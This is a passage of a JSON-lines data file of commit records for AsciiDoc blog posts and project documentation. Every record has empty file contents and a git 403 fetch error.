2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f13930cc8b7548031845b36166df994ef065f67","subject":"y2b create post iPod Nano 6th Generation Unboxing \\u0026 Overview","message":"y2b create post iPod Nano 6th Generation Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-11-iPod-Nano-6th-Generation-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-11-iPod-Nano-6th-Generation-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8992850758f26ce30aece7a114c7272ea836d046","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e61aefa0ba366e142763dfde3427791763671e5","subject":"Create sample.adoc","message":"Create sample.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"lib\/smru-inline-macros\/sample.adoc","new_file":"lib\/smru-inline-macros\/sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac2b78bc8d2e282f09eb6970baf4e0224b13421","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82fd546501c7120e18aca846afce7d418e840e91","subject":"y2b create post $99 Virtual Reality!","message":"y2b create post $99 Virtual Reality!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-09-99-Virtual-Reality.adoc","new_file":"_posts\/2015-06-09-99-Virtual-Reality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b116a5e31d344d06dc2041d2c1370cd73fbed8ef","subject":"Update 2016-04-11-My-first-Blog-Post.adoc","message":"Update 2016-04-11-My-first-Blog-Post.adoc","repos":"RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test","old_file":"_posts\/2016-04-11-My-first-Blog-Post.adoc","new_file":"_posts\/2016-04-11-My-first-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RussellSnyder\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb78ed986889ca61acc8b8494fd257c9a68e8a3","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 
2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a838dfe48a7124696aba236763042dd2626d9430","subject":"Update 2016-03-29-First-Post.adoc","message":"Update 2016-03-29-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-03-29-First-Post.adoc","new_file":"_posts\/2016-03-29-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ae9a1fd13b442e14b8ceb36a605bac2f754b3d","subject":"Update 2018-08-30-Docker-bro.adoc","message":"Update 2018-08-30-Docker-bro.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-08-30-Docker-bro.adoc","new_file":"_posts\/2018-08-30-Docker-bro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"515daa90f385ed705a44b1792513561cbb637380","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_world.adoc","new_file":"content\/writings\/hello_world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f33a41631a9f79a0a4b5322f36c6d7898a4b2017","subject":"CAMEL-16341 - Having a middle folder for vertx components","message":"CAMEL-16341 - Having a middle folder for vertx components\n","repos":"tdiesler\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pax95\/camel,apache\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da6127d6bb6d921e5f7754adaa8fad9230bf4c7e","subject":"Update 2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","message":"Update 2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","new_file":"_posts\/2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d2748a6edfec152d4d4a3ec0dee32952a4323a8","subject":"Update 2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","message":"Update 2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","new_file":"_posts\/2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ff3914fd85cf184c9f0a5a5a03456082297afe","subject":"[DOCS] Correct over field usage for freq rare function (elastic\/x-pack-elasticsearch#3435)","message":"[DOCS] Correct over field usage for freq rare function (elastic\/x-pack-elasticsearch#3435)\n\nOriginal commit: elastic\/x-pack-elasticsearch@2b315610b93d327e7f5473c8db9f1edc6f79e695\n","repos":"robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/ml\/functions\/rare.asciidoc","new_file":"docs\/en\/ml\/functions\/rare.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f49615567bdef64d110e0ce3f7db527d832302c","subject":"Update 
2016-08-17-Moving-From-Java-To-Scala.adoc","message":"Update 2016-08-17-Moving-From-Java-To-Scala.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-17-Moving-From-Java-To-Scala.adoc","new_file":"_posts\/2016-08-17-Moving-From-Java-To-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c0def4ced9b534612f208ce0b2da1e547b4ff3ef","subject":"Update 2016-09-15-Episode-72-The-Money-Shot.adoc","message":"Update 2016-09-15-Episode-72-The-Money-Shot.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-15-Episode-72-The-Money-Shot.adoc","new_file":"_posts\/2016-09-15-Episode-72-The-Money-Shot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2729164e36a0f3da3571b728b931ad7941340003","subject":"y2b create post Simple Audio Listen Unboxing \\u0026 Test","message":"y2b create post Simple Audio Listen Unboxing \\u0026 Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-17-Simple-Audio-Listen-Unboxing-u0026-Test.adoc","new_file":"_posts\/2013-12-17-Simple-Audio-Listen-Unboxing-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"bedabc5fd541c286182eb75587ecf2b2d81b96de","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cca8b0dc8b055b330d5343100c85536ac90e1bba","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b3a5faea4fedd6d80425df640d021b2a41ec559b","subject":"added week4 content","message":"added week4 content\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"b4bf43a55fc6360f71d8032e6baecb93dd7cd848","subject":"Update 2016-11-07-Trees.adoc","message":"Update 2016-11-07-Trees.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-07-Trees.adoc","new_file":"_posts\/2016-11-07-Trees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"67bd9f1f0d10bc14b45114a790e85b611d9d9470","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa3adad65cfbc99cb5c49d4dd97287840ad69d1b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3912d2e55a41680ec65632f252a99af722643c44","subject":"Starting moving old release notes for the new site, from 2.17.0 ahead. Release 2.17.0 added","message":"Starting moving old release notes for the new site, from 2.17.0 ahead. Release 2.17.0 added\n","repos":"CodeSmell\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,anoordover\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,objectiser\/camel,tadayosi\/camel,anoordover\/camel,nikhilvibhav\/camel,kevinearls\/camel,apache\/camel,davidkarlsen\/camel,anoordover\/camel,Fabryprog\/camel,mcollovati\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,zregvart\/camel,pax95\/camel,objectiser\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,christophd\/camel,sverkera\/camel,kevinearls\/camel,adessaigne\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,tadayosi\/camel,DariusX\/camel,tdiesler\/camel,pmoerenhout\/camel,gnodet\/camel,tdiesler\/camel,gnodet\/camel,zregvart\/camel,christophd\/camel,CodeSmell\/camel,anoordover\/camel,sverkera\/camel,tdiesler\/camel,onders86\/camel,kevinearls\/camel,pax95\/camel,gnodet\/camel,kevinearls\/camel,jamesnetherton\/camel,tadayosi\/camel,zregvart\/camel,christophd\/camel,cunningt\/camel,anoordover\/camel,Fabryprog\/camel,cunningt\/camel,jamesnetherton\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,Fabryprog\/camel,christophd\/camel,adessaigne\/camel,punkhorn\/camel-upstream,sverkera\/camel,apache\/camel,mcollovati\/camel,adessaigne\/camel,sverkera\/camel,apache\/camel,alvinkwekel\/camel,jamesnetherton\/camel,alvinkwekel\/camel,pax95\/camel,pax95\/camel,onders86\/camel,alvinkwekel\/camel,pax95\/camel,Fabryprog\/camel,tadayosi\/camel,davidkarlsen\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,ullgren\/camel,CodeSmell\/camel,sverkera\/camel,tadayosi\/camel,zregvart\/camel,adessaigne\/camel,zregvart\/camel,cunningt\/camel,ullgren\/camel,DariusX\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,nicolaferraro\/camel,christophd\/camel,sverkera\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2170-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2170-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"ca86c4fd2e5f0a8a42d15769a33183eb8e736021","subject":"Publish 2016-10-12.adoc","message":"Publish 2016-10-12.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"2016-10-12.adoc","new_file":"2016-10-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ff060d15c69c6f6e72e0fe8749552de43d21f9c0","subject":"Update 2015-03-18-The-Docs-Guy.adoc","message":"Update 2015-03-18-The-Docs-Guy.adoc","repos":"HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-03-18-The-Docs-Guy.adoc","new_file":"_posts\/2015-03-18-The-Docs-Guy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"803906ca7e852f325cc85dadcec25bbf688a30de","subject":"Update 2015-11-23-Konu-Basligi.adoc","message":"Update 2015-11-23-Konu-Basligi.adoc","repos":"mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io","old_file":"_posts\/2015-11-23-Konu-Basligi.adoc","new_file":"_posts\/2015-11-23-Konu-Basligi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhmtbsbyndr\/mhmtbsbyndr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"425ae42582cadd1d09990e23750c5212d3e0ba51","subject":"Update 2017-03-10-Por-que-escolher-Native-Script.adoc","message":"Update 2017-03-10-Por-que-escolher-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-10-Por-que-escolher-Native-Script.adoc","new_file":"_posts\/2017-03-10-Por-que-escolher-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c4bf645c8681f133c5996d6514906065b138d776","subject":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d2975b8d89de6491164b01d8507f1b0c0cfca82c","subject":"Add README","message":"Add README\n","repos":"sattvik\/baitha","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sattvik\/baitha.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"6731c93007a89d15003a3e0d26dccd0628524080","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9bfe7e044567bcf296a63bf6b6514823767ebd2c","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"060535764d7bfc0baf1ceb4be3074815a2423dca","subject":"Update 2001-01-01-tron-dance.adoc","message":"Update 2001-01-01-tron-dance.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2001-01-01-tron-dance.adoc","new_file":"_posts\/2001-01-01-tron-dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e3e8a4ae1dcdb4ea4ce34c9038db66e0644c1695","subject":"Update 2015-12-14-AB-testing.adoc","message":"Update 2015-12-14-AB-testing.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-14-AB-testing.adoc","new_file":"_posts\/2015-12-14-AB-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2dc643449cc2d20c168aa8466b203a121218a745","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"da5bdbd62e674dd8f518ad1c4ab9fedff2b2586a","subject":"Update 2009-04-20-Oracle-will-buy-Sun.adoc","message":"Update 2009-04-20-Oracle-will-buy-Sun.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-20-Oracle-will-buy-Sun.adoc","new_file":"_posts\/2009-04-20-Oracle-will-buy-Sun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"15fe85528179cbf9fb3152e8eb679e922dfd38fa","subject":"Update 2015-07-02-Mein-erster-Beitrag.adoc","message":"Update 2015-07-02-Mein-erster-Beitrag.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-02-Mein-erster-Beitrag.adoc","new_file":"_posts\/2015-07-02-Mein-erster-Beitrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0941627bbd4b0889eb7e00e4870c912db1d1fdfa","subject":"Update 2015-09-07-Herzlich-Willkommen.adoc","message":"Update 2015-09-07-Herzlich-Willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
